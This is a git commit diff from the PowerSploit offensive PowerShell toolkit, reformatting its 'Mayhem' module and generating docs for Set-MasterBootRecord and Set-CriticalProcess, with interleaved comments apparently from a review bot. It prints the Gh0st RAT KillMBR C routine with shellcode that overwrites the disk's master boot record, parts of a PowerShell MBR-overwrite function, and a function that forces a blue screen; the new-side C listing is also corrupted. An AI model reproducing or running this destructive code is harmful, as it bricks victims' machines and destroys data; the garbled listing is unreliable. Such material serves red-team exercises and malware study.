authorHarmJ0y <will@harmj0y.net>2016-12-14 18:05:22 -0500
committerHarmJ0y <will@harmj0y.net>2016-12-14 18:05:22 -0500
commita81faf36a4cdf925b4cb7cc1019648b37967e0bc (patch)
tree826a575654ededd5de871565da3f18af345f2825
parent1980f403ee78234eae4d93b50890d02f827a099f (diff)
downloadPowerSploit-a81faf36a4cdf925b4cb7cc1019648b37967e0bc.tar.gz
PowerSploit-a81faf36a4cdf925b4cb7cc1019648b37967e0bc.zip
For ./Mayhem/ :
-PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs
-rw-r--r--Mayhem/Mayhem.psm1180
-rwxr-xr-xdocs/Mayhem/Set-CriticalProcess.md108
-rwxr-xr-xdocs/Mayhem/Set-MasterBootRecord.md184
-rw-r--r--mkdocs.yml12
4 files changed, 391 insertions, 93 deletions
diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1
index 0baaf3e..5fbdde2 100644
--- a/Mayhem/Mayhem.psm1
+++ b/Mayhem/Mayhem.psm1
@@ -3,109 +3,109 @@ function Set-MasterBootRecord
<#
.SYNOPSIS
- Proof of concept code that overwrites the master boot record with the
- message of your choice.
-
- PowerSploit Function: Set-MasterBootRecord
- Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
-
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
.DESCRIPTION
- Set-MasterBootRecord is proof of concept code designed to show that it is
- possible with PowerShell to overwrite the MBR. This technique was taken
- from a public malware sample. This script is inteded solely as proof of
- concept code.
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR. This technique was taken
+from a public malware sample. This script is inteded solely as proof of
+concept code.
.PARAMETER BootMessage
- Specifies the message that will be displayed upon making your computer a brick.
+Specifies the message that will be displayed upon making your computer a brick.
.PARAMETER RebootImmediately
- Reboot the machine immediately upon overwriting the MBR.
+Reboot the machine immediately upon overwriting the MBR.
.PARAMETER Force
- Suppress the warning prompt.
+Suppress the warning prompt.
.EXAMPLE
- Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
.NOTES
- Obviously, this will only work if you have a master boot record to
- overwrite. This won't work if you have a GPT (GUID partition table)
-#>
+Obviously, this will only work if you have a master boot record to
+overwrite. This won't work if you have a GPT (GUID partition table).
-<#
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
-// CGh0stApp message handlers
-
-unsigned char scode[] =
-"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
-"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
-"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
-
-int CGh0stApp::KillMBR()
-{
- HANDLE hDevice;
- DWORD dwBytesWritten, dwBytesReturned;
- BYTE pMBR[512] = {0};
-
- // ????MBR
- memcpy(pMBR, scode, sizeof(scode) - 1);
- pMBR[510] = 0x55;
- pMBR[511] = 0xAA;
-
- hDevice = CreateFile
- (
- "\\\\.\\PHYSICALDRIVE0",
- GENERIC_READ | GENERIC_WRITE,
- FILE_SHARE_READ | FILE_SHARE_WRITE,
- NULL,
- OPEN_EXISTING,
- 0,
- NULL
- );
- if (hDevice == INVALID_HANDLE_VALUE)
- return -1;
- DeviceIoControl
- (
- hDevice,
- FSCTL_LOCK_VOLUME,
- NULL,
- 0,
- NULL,
- 0,
- &dwBytesReturned,
- NULL
- );
- // ??????
- WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
- DeviceIoControl
- (
- hDevice,
- FSCTL_UNLOCK_VOLUME,
- NULL,
- 0,
- NULL,
- 0,
- &dwBytesReturned,
- NULL
- );
- CloseHandle(hDevice);
-
- ExitProcess(-1);
- return 0;
-}
+// CGh0stApp message handlers
+
+unsigned char scode[] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+ HANDLE hDevice;
+ DWORD dwBytesWritten, dwBytesReturned;
+ BYTE pMBR[512] = {0};
+
+ // ????MBR
+ memcpy(pMBR, scode, sizeof(scode) - 1);
+ pMBR[510] = 0x55;
+ pMBR[511] = 0xAA;
+
+ hDevice = CreateFile
+ (
+ "\\\\.\\PHYSICALDRIVE0",
+ GENERIC_READ | GENERIC_WRITE,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ NULL,
+ OPEN_EXISTING,
+ 0,
+ NULL
+ );
+ if (hDevice == INVALID_HANDLE_VALUE)
+ return -1;
+ DeviceIoControl
+ (
+ hDevice,
+ FSCTL_LOCK_VOLUME,
+ NULL,
+ 0,
+ NULL,
+ 0,
+ &dwBytesReturned,
+ NUL
+ )
+ // ??????
+ WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+ DeviceIoControl
+ (
+ hDevice,
+ FSCTL_UNLOCK_VOLUME,
+ NULL,
+ 0,
+ NULL,
+ 0,
+ &dwBytesReturned,
+ NULL
+ );
+ CloseHandle(hDevice);
+
+ ExitProcess(-1);
+ return 0;
+}
#>
- [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+ [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+ Param (
[ValidateLength(1, 479)]
[String]
$BootMessage = 'Stop-Crying; Get-NewHardDrive',
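Review bot: The quoted Gh0st reference listing is corrupted on the new side at the first DeviceIoControl call, where `NUL` and `)` replace what the removed block had as `NULL,` and `);`, so the sample no longer reads as valid C and the same typo is carried verbatim into the generated docs/Mayhem/Set-MasterBootRecord.md. Restore the two lines as `NULL` and `);`. Because the `#>` / `<#` pair that used to separate the help block from this listing was dropped, the whole C sample is now part of .NOTES and is emitted into user-facing help, which appears to be intended for platyPS but is worth confirming. The .NOTES claim that this "won't work" on GPT disks also understates the risk: a GPT disk still carries a protective MBR at LBA 0, so a raw write to sector 0 can corrupt the partition layout even though firmware will never execute the message; the write itself is outside this hunk, so confirm against the function body. Set-MasterBootRecord's body continues past the end of the hunk.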
@@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
$MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
# Zero-initialize the allocated unmanaged memory
- 0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
+ 0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
[Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
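Review bot: The zero-fill loop `0..511 | ForEach-Object { ... }` hard-codes the byte count while the buffer on the line above was allocated with `$MBRSize`; if the two ever diverge the loop either leaves bytes uninitialized or writes past the unmanaged allocation. Tie it to the same value: `0..($MBRSize - 1) | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }`. Whether the AllocHGlobal buffer is released with FreeHGlobal on every exit path cannot be checked here, as the rest of the function lies outside this hunk.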
@@ -272,11 +272,11 @@ function Set-CriticalProcess
Causes your machine to blue screen upon exiting PowerShell.
-PowerSploit Function: Set-CriticalProcess
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
.PARAMETER ExitImmediately
@@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
#>
- [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+ Param (
[Switch]
$Force,
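Review bot: `[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]` silences the analyzer for the whole function without saying which assigned-but-unread variable triggers it, which is the kind of blanket suppression that later hides a genuine dead store or a dropped P/Invoke return value. Either remove or consume the offending variable (its assignment is outside this hunk, so it cannot be checked from here), or record the reason in the attribute, e.g. `[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '', Justification = 'name the variable and why it must stay')]`. The same applies to the `PSAvoidUsingWMICmdlet` suppression added to Set-MasterBootRecord in the first hunk. Set-CriticalProcess's Param block and body continue past the end of this hunk.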
@@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose
{
$Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
}
-
+
if (!$Response)
{
return
diff --git a/docs/Mayhem/Set-CriticalProcess.md b/docs/Mayhem/Set-CriticalProcess.md
new file mode 100755
index 0000000..1ec952f
--- /dev/null
+++ b/docs/Mayhem/Set-CriticalProcess.md
@@ -0,0 +1,108 @@
+# Set-CriticalProcess
+
+## SYNOPSIS
+Causes your machine to blue screen upon exiting PowerShell.
+
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-CriticalProcess
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Set-CriticalProcess -ExitImmediately
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Set-CriticalProcess -Force -Verbose
+```
+
+## PARAMETERS
+
+### -Force
+Set the running PowerShell process as critical without asking for confirmation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExitImmediately
+Immediately exit PowerShell after successfully marking the process as critical.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Mayhem/Set-MasterBootRecord.md b/docs/Mayhem/Set-MasterBootRecord.md
new file mode 100755
index 0000000..0aa994d
--- /dev/null
+++ b/docs/Mayhem/Set-MasterBootRecord.md
@@ -0,0 +1,184 @@
+# Set-MasterBootRecord
+
+## SYNOPSIS
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
+```
+
+## DESCRIPTION
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR.
+This technique was taken
+from a public malware sample.
+This script is inteded solely as proof of
+concept code.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+```
+
+## PARAMETERS
+
+### -BootMessage
+Specifies the message that will be displayed upon making your computer a brick.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: Stop-Crying; Get-NewHardDrive
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RebootImmediately
+Reboot the machine immediately upon overwriting the MBR.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Suppress the warning prompt.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+Obviously, this will only work if you have a master boot record to
+overwrite.
+This won't work if you have a GPT (GUID partition table).
+
+This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
+
+// CGh0stApp message handlers
+
+unsigned char scode\[\] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+ HANDLE hDevice;
+ DWORD dwBytesWritten, dwBytesReturned;
+ BYTE pMBR\[512\] = {0};
+
+ // ????MBR
+ memcpy(pMBR, scode, sizeof(scode) - 1);
+ pMBR\[510\] = 0x55;
+ pMBR\[511\] = 0xAA;
+
+ hDevice = CreateFile
+ (
+ "\\\\\\\\.\\\\PHYSICALDRIVE0",
+ GENERIC_READ | GENERIC_WRITE,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ NULL,
+ OPEN_EXISTING,
+ 0,
+ NULL
+ );
+ if (hDevice == INVALID_HANDLE_VALUE)
+ return -1;
+ DeviceIoControl
+ (
+ hDevice,
+ FSCTL_LOCK_VOLUME,
+ NULL,
+ 0,
+ NULL,
+ 0,
+ &dwBytesReturned,
+ NUL
+ )
+ // ??????
+ WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+ DeviceIoControl
+ (
+ hDevice,
+ FSCTL_UNLOCK_VOLUME,
+ NULL,
+ 0,
+ NULL,
+ 0,
+ &dwBytesReturned,
+ NULL
+ );
+ CloseHandle(hDevice);
+
+ ExitProcess(-1);
+ return 0;
+}
+
+## RELATED LINKS
+
diff --git a/mkdocs.yml b/mkdocs.yml
index 8cc8a39..8012ab0 100644
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -124,7 +124,11 @@ pages:
- Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
- CodeExecution:
- Functions:
- - Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md'
- - Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md'
- - Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md'
- - Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md'
+ - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
+ - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
+ - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
+ - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
+- Mayhem:
+ - Functions:
+ - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
+ - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'